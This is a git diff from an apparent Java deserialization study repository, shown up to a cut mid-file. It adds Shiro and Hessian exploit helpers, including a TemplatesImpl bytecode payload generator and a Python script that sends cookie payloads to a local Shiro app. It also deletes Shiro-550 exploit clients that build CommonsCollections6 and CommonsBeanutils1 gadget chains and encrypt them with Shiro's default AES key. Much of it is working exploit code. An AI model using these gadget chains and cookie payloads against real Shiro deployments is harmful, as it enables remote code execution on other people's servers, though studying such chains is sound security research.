+1,15 @@ +package tools; + +import sun.misc.Unsafe; + +import java.lang.reflect.Field; + +public class UnsafeTools { + // 绕过构造方法获取对象 + public static Object getObjectByUnsafe(Class clazz) throws Exception{ + Field theUnsafe = Unsafe.class.getDeclaredField("theUnsafe"); + theUnsafe.setAccessible(true); + Unsafe unsafe = (Unsafe) theUnsafe.get(null); + return unsafe.allocateInstance(clazz); + } +} diff --git a/hessian/src/main/java/tools/sinkClass/ToStringClass.java b/hessian/src/main/java/tools/sinkClass/ToStringClass.java new file mode 100644 index 0000000..7169c10 --- /dev/null +++ b/hessian/src/main/java/tools/sinkClass/ToStringClass.java @@ -0,0 +1,15 @@ +package tools.sinkClass; + +import java.io.Serializable; + +public class ToStringClass implements Serializable { + public String toString(){ + System.out.println("toString pwned"); + return "toString pwned"; + } + + public int hashCode(){ + System.out.println("hashCode pwned"); + return 0; + } +} diff --git a/shiro/.idea/shiro.iml b/shiro/.idea/shiro.iml new file mode 100644 index 0000000..79c6a37 --- /dev/null +++ b/shiro/.idea/shiro.iml @@ -0,0 +1,16 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/shiro/python/.idea/python.iml b/shiro/python/.idea/python.iml new file mode 100644 index 0000000..f571432 --- /dev/null +++ b/shiro/python/.idea/python.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/shiro/shiroDeser/BadInterceptor_within.class b/shiro/shiroDeser/BadInterceptor_within.class new file mode 100644 index 0000000..9fc3825 Binary files /dev/null and b/shiro/shiroDeser/BadInterceptor_within.class differ diff --git a/shiro/shiroDeser/Calc.class b/shiro/shiroDeser/Calc.class new file mode 100644 index 0000000..8580c8f Binary files /dev/null and b/shiro/shiroDeser/Calc.class differ diff --git a/hessian/HessianStudy/utf8.bin b/shiro/shiroDeser/CalcAbs.class similarity index 70% rename from hessian/HessianStudy/utf8.bin rename to shiro/shiroDeser/CalcAbs.class index 21016ad..d22b012 100644 Binary files a/hessian/HessianStudy/utf8.bin and b/shiro/shiroDeser/CalcAbs.class differ diff --git a/shiro/shiroDeser/SimpleInterceptor.class b/shiro/shiroDeser/SimpleInterceptor.class new file mode 100644 index 0000000..7a9bf29 Binary files /dev/null and b/shiro/shiroDeser/SimpleInterceptor.class differ diff --git a/shiro/shiroDeser/SpringEcho.class b/shiro/shiroDeser/SpringEcho.class new file mode 100644 index 0000000..c44500c Binary files /dev/null and b/shiro/shiroDeser/SpringEcho.class differ diff --git a/shiro/shiroDeser/loadClass.class b/shiro/shiroDeser/loadClass.class new file mode 100644 index 0000000..9e3e143 Binary files /dev/null and b/shiro/shiroDeser/loadClass.class differ diff --git a/shiro/shiroDeser/python/enc_dec.py b/shiro/shiroDeser/python/enc_dec.py new file mode 100644 index 0000000..e69de29 diff --git a/shiro/shiroDeser/python/fileWrite.py b/shiro/shiroDeser/python/fileWrite.py new file mode 100644 index 0000000..a0b80fa --- /dev/null +++ b/shiro/shiroDeser/python/fileWrite.py @@ -0,0 +1,19 @@ +import requests + + +with open("../fileWrite.txt", "r") as f: + burp0_url = "http://127.0.0.1:8083/home" + + burp0_headers = {"Cache-Control": "max-age=0", "Accept-Language": "zh-CN,zh;q=0.9", + "Upgrade-Insecure-Requests": "1", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", + "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", + "Sec-Fetch-Dest": "document", "sec-ch-ua": "\"Not A(Brand\";v=\"8\", \"Chromium\";v=\"132\"", + "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "\"Windows\"", + "Referer": "http://127.0.0.1:8083/login?error", "Accept-Encoding": "gzip, deflate, br", + "Connection": "keep-alive"} + for line in f: + burp0_cookies = {"rememberMe": f"{line}"} + resp = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) + print(resp.text) \ No newline at end of file diff --git a/shiro/shiroDeser/src/main/java/com/exp/CB.java b/shiro/shiroDeser/src/main/java/com/exp/CB.java new file mode 100644 index 0000000..a7a6436 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/CB.java @@ -0,0 +1,4 @@ +package com.exp; + +public class CB { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/ClassByteGen.java b/shiro/shiroDeser/src/main/java/com/exp/ClassByteGen.java new file mode 100644 index 0000000..37b2b8f --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/ClassByteGen.java @@ -0,0 +1,4 @@ +package com.exp; + +public class ClassByteGen { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java b/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java new file mode 100644 index 0000000..df209a5 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/KeyDetect.java @@ -0,0 +1,4 @@ +package com.exp; + +public class KeyDetect { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/L.java b/shiro/shiroDeser/src/main/java/com/exp/L.java new file mode 100644 index 0000000..e01eafc --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/L.java @@ -0,0 +1,4 @@ +package com.exp; + +public class L { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java b/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java new file mode 100644 index 0000000..81daacd --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/TemplatesGen.java @@ -0,0 +1,54 @@ +package tools; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; + +import javax.xml.transform.Templates; +import java.io.*; +import java.lang.reflect.Field; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class TemplatesGen { + public static Templates getTemplates(String bytePath) throws IOException, IllegalAccessException { + byte[] bytes = Files.readAllBytes(Paths.get(bytePath)); + TemplatesImpl templates = new TemplatesImpl(); + setFieldValue(templates, "_name", "1diot9"); + setFieldValue(templates, "_class", null); + setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + setFieldValue(templates, "_bytecodes", new byte[][]{bytes}); + + return templates; + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { + Class aClass = obj.getClass(); + Field field = null; + try { + field = aClass.getDeclaredField(fieldName); + } catch (NoSuchFieldException e) { + aClass = aClass.getSuperclass(); + } + field.setAccessible(true); + field.set(obj, value); + } + + public static byte[] ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(obj); + return baos.toByteArray(); + } + + public static void ser2file(Object obj, String fileName) throws IOException { + FileOutputStream fos = new FileOutputStream(fileName); + ObjectOutputStream oos = new ObjectOutputStream(fos); + oos.writeObject(obj); + } + + public static Object deser(byte[] bytes) throws IOException, ClassNotFoundException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + } +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/WriteFile.java b/shiro/shiroDeser/src/main/java/com/exp/WriteFile.java new file mode 100644 index 0000000..ba99731 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/WriteFile.java @@ -0,0 +1,4 @@ +package com.exp; + +public class WriteFile { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/WriteProperty.java b/shiro/shiroDeser/src/main/java/com/exp/WriteProperty.java new file mode 100644 index 0000000..ed68afb --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/WriteProperty.java @@ -0,0 +1,4 @@ +package com.exp; + +public class WriteProperty { +} diff --git a/shiro/shiroDeser/src/main/java/com/exp/tmp.java b/shiro/shiroDeser/src/main/java/com/exp/tmp.java new file mode 100644 index 0000000..8c3d2c1 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/exp/tmp.java @@ -0,0 +1,4 @@ +package com.exp; + +public class tmp { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/WebApplication.java b/shiro/shiroDeser/src/main/java/com/test/WebApplication.java new file mode 100644 index 0000000..ebd52a5 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/WebApplication.java @@ -0,0 +1,4 @@ +package com.test; + +public class WebApplication { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java b/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java new file mode 100644 index 0000000..8188334 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/config/ShiroConfig.java @@ -0,0 +1,4 @@ +package com.test.config; + +public class ShiroConfig { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java b/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java new file mode 100644 index 0000000..6389c4f --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/config/UserRealm.java @@ -0,0 +1,4 @@ +package com.test.config; + +public class UserRealm { +} diff --git a/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java b/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java new file mode 100644 index 0000000..2a8f913 --- /dev/null +++ b/shiro/shiroDeser/src/main/java/com/test/controller/LoginController.java @@ -0,0 +1,4 @@ +package com.test.controller; + +public class LoginController { +} diff --git a/shiro/shiroDeser/src/main/resources/application.yml b/shiro/shiroDeser/src/main/resources/application.yml new file mode 100644 index 0000000..e69de29 diff --git a/shiro/shiroDeser/src/main/resources/templates/home.html b/shiro/shiroDeser/src/main/resources/templates/home.html new file mode 100644 index 0000000..d6ef988 --- /dev/null +++ b/shiro/shiroDeser/src/main/resources/templates/home.html @@ -0,0 +1,10 @@ + + + + Home + + +

Welcome, You are logged in!

+Logout + + diff --git a/shiro/shiroDeser/src/main/resources/templates/login.html b/shiro/shiroDeser/src/main/resources/templates/login.html new file mode 100644 index 0000000..ac0fd72 --- /dev/null +++ b/shiro/shiroDeser/src/main/resources/templates/login.html @@ -0,0 +1,14 @@ + + + + Login + + + +

Invalid credentials

+ + diff --git a/shiro/shiroattack/pom.xml b/shiro/shiroattack/pom.xml deleted file mode 100644 index cbf7952..0000000 --- a/shiro/shiroattack/pom.xml +++ /dev/null @@ -1,96 +0,0 @@ - - - - 4.0.0 - - com.govuln - shiroattack - 1.0-SNAPSHOT - - shiroattack - - http://www.example.com - - - UTF-8 - 1.8 - 1.8 - - - - - org.apache.shiro - shiro-core - 1.2.4 - - - - org.javassist - javassist - 3.27.0-GA - - - - commons-collections - commons-collections - 3.2.1 - - - - - - - - - maven-clean-plugin - 3.1.0 - - - - maven-resources-plugin - 3.0.2 - - - maven-compiler-plugin - 3.8.0 - - - maven-surefire-plugin - 2.22.1 - - - maven-jar-plugin - 3.0.2 - - - maven-install-plugin - 2.5.2 - - - maven-deploy-plugin - 2.8.2 - - - - maven-site-plugin - 3.7.1 - - - maven-project-info-reports-plugin - 3.0.0 - - - - - - org.apache.maven.plugins - maven-compiler-plugin - - 8 - 8 - - - - - diff --git a/shiro/shiroattack/shiroattack.iml b/shiro/shiroattack/shiroattack.iml deleted file mode 100644 index 78b2cc5..0000000 --- a/shiro/shiroattack/shiroattack.iml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java deleted file mode 100644 index 12d86a5..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client.java +++ /dev/null @@ -1,20 +0,0 @@ -package com.govuln.shiroattack; - -import javassist.ClassPool; -import javassist.CtClass; -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client { - public static void main(String []args) throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); - byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); - - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java deleted file mode 100644 index 177dec5..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java +++ /dev/null @@ -1,15 +0,0 @@ -package com.govuln.shiroattack; - -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client0 { - public static void main(String []args) throws Exception { - byte[] payloads = new CommonsCollections6().getPayload("calc.exe"); - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java deleted file mode 100644 index 4f59ed8..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Client1.java +++ /dev/null @@ -1,20 +0,0 @@ -package com.govuln.shiroattack; - -import javassist.ClassPool; -import javassist.CtClass; -import org.apache.shiro.crypto.AesCipherService; -import org.apache.shiro.util.ByteSource; - -public class Client1 { - public static void main(String []args) throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); - byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode()); - - AesCipherService aes = new AesCipherService(); - byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); - - ByteSource ciphertext = aes.encrypt(payloads, key); - System.out.printf(ciphertext.toString()); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java deleted file mode 100644 index d7fcdd4..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java +++ /dev/null @@ -1,43 +0,0 @@ -package com.govuln.shiroattack; - -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import org.apache.commons.beanutils.BeanComparator; - -import java.io.ByteArrayOutputStream; -import java.io.ObjectOutputStream; -import java.lang.reflect.Field; -import java.util.PriorityQueue; - -public class CommonsBeanutils1Shiro { - public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { - Field field = obj.getClass().getDeclaredField(fieldName); - field.setAccessible(true); - field.set(obj, value); - } - - public byte[] getPayload(byte[] clazzBytes) throws Exception { - TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); - setFieldValue(obj, "_name", "HelloTemplatesImpl"); - setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); - - final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); - final PriorityQueue